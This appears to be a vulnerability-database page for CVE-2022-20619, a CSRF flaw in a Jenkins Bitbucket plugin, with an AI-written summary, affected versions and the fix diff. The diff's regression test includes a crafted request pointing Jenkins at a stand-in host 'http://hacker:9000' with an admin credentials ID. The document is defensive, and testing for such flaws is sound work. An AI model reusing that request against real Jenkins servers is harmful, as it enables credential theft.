CVE-2022-20619
Description
A CSRF vulnerability in Jenkins Bitbucket Branch Source Plugin allows attackers to connect to an attacker-specified URL using stolen credentials.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A CSRF vulnerability in Jenkins Bitbucket Branch Source Plugin allows attackers to connect to an attacker-specified URL using stolen credentials.
Vulnerability
A cross-site request forgery (CSRF) vulnerability exists in Jenkins Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier. The plugin does not require a POST request or perform a permission check on a specific endpoint, enabling an attacker to craft a malicious request that, when triggered by an authenticated Jenkins user, connects to an attacker-specified URL using attacker-specified credentials IDs (initially obtained through another method). This allows the attacker to capture credentials stored in Jenkins. [1][2][3]
Exploitation
To exploit this vulnerability, an attacker must first obtain credentials IDs from Jenkins via another method (e.g., a separate vulnerability or information disclosure). The attacker then crafts a CSRF attack, tricking an authenticated Jenkins user into visiting a malicious page or link. The request is made to the vulnerable endpoint in Bitbucket Branch Source Plugin, using the stolen credentials IDs to connect to an attacker-controlled server. This results in the credentials being transmitted to the attacker. [1][3]
Impact
A successful attack results in the disclosure of credentials stored in Jenkins. The attacker can capture these credentials by having the Jenkins instance connect to an attacker-specified URL using the known credentials IDs. This compromises the confidentiality of Jenkins-managed secrets and can lead to further unauthorized access to systems that those credentials protect. [1][3]
Mitigation
The vulnerability is fixed in Bitbucket Branch Source Plugin version 746.v350d2781c184 and later, released on January 12, 2022. Users should upgrade to this version or later. No workarounds are documented in the available references. [1][2]
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.jenkins-ci.plugins:cloudbees-bitbucket-branch-sourceMaven | >= 726.v7e6f53de133c, < 746.v350d2781c184 | 746.v350d2781c184 |
org.jenkins-ci.plugins:cloudbees-bitbucket-branch-sourceMaven | >= 720.vbe985dd73d66, < 725.vd9f8be0fa250 | 725.vd9f8be0fa250 |
org.jenkins-ci.plugins:cloudbees-bitbucket-branch-sourceMaven | >= 2.9.8, < 2.9.11.2 | 2.9.11.2 |
org.jenkins-ci.plugins:cloudbees-bitbucket-branch-sourceMaven | < 2.9.7.2 | 2.9.7.2 |
Affected products
2- ghsa-coordsRange: >= 726.v7e6f53de133c, < 746.v350d2781c184
- Range: unspecified
Patches
1a596f651a4b3SECURITY-2467
2 files changed · +41 −0
src/main/java/com/cloudbees/jenkins/plugins/bitbucket/BitbucketSCMSource.java+2 −0 modified@@ -121,6 +121,7 @@ import org.kohsuke.stapler.DataBoundConstructor; import org.kohsuke.stapler.DataBoundSetter; import org.kohsuke.stapler.QueryParameter; +import org.kohsuke.stapler.interceptor.RequirePOST; /** * SCM source implementation for Bitbucket. @@ -1191,6 +1192,7 @@ public ListBoxModel doFillCredentialsIdItems(@AncestorInPath SCMSourceOwner cont } @SuppressWarnings("unused") // used By stapler + @RequirePOST public ListBoxModel doFillRepositoryItems(@AncestorInPath SCMSourceOwner context, @QueryParameter String serverUrl, @QueryParameter String credentialsId,
src/test/java/com/cloudbees/jenkins/plugins/bitbucket/Security2467Test.java+39 −0 added@@ -0,0 +1,39 @@ +package com.cloudbees.jenkins.plugins.bitbucket; + +import com.gargoylesoftware.htmlunit.html.HtmlPage; +import java.net.HttpURLConnection; +import jenkins.model.Jenkins; +import org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProject; +import org.junit.Rule; +import org.junit.Test; +import org.jvnet.hudson.test.Issue; +import org.jvnet.hudson.test.JenkinsRule; +import org.jvnet.hudson.test.MockAuthorizationStrategy; + +import static org.hamcrest.MatcherAssert.assertThat; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.is; + +public class Security2467Test { + + @Rule + public JenkinsRule j = new JenkinsRule(); + + @Issue("SECURITY-2467") + @Test + public void doFillRepositoryItemsWhenInvokedUsingGetMethodThenReturnMethodNotAllowed() throws Exception { + String admin = "Admin"; + String projectName = "p"; + WorkflowMultiBranchProject pr = j.jenkins.createProject(WorkflowMultiBranchProject.class, projectName); + j.jenkins.setSecurityRealm(j.createDummySecurityRealm()); + j.jenkins.setAuthorizationStrategy(new MockAuthorizationStrategy(). + grant(Jenkins.ADMINISTER).everywhere().to(admin)); + + JenkinsRule.WebClient webClient = j.createWebClient().withThrowExceptionOnFailingStatusCode(false); + webClient.login(admin); + HtmlPage htmlPage = webClient.goTo("job/" + projectName +"/descriptorByName/com.cloudbees.jenkins.plugins.bitbucket.BitbucketSCMSource/fillRepositoryItems?serverUrl=http://hacker:9000&credentialsId=ID_Admin&repoOwner=admin"); + + assertThat(htmlPage.getWebResponse().getStatusCode(), is(HttpURLConnection.HTTP_BAD_METHOD)); + assertThat(htmlPage.getWebResponse().getContentAsString(), containsString("This URL requires POST")); + } +}
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/advisories/GHSA-w4jv-6rg4-pr4mghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2022-20619ghsaADVISORY
- www.openwall.com/lists/oss-security/2022/01/12/6ghsamailing-listx_refsource_MLISTWEB
- github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2022/20xxx/CVE-2022-20619.jsonghsaWEB
- github.com/jenkinsci/bitbucket-branch-source-plugin/commit/a596f651a4b3bfe31a087c4d392e81c0167ab551ghsaWEB
- www.jenkins.io/security/advisory/2022-01-12/ghsax_refsource_CONFIRMWEB
News mentions
1- Jenkins Security Advisory 2022-01-12Jenkins Security Advisories · Jan 12, 2022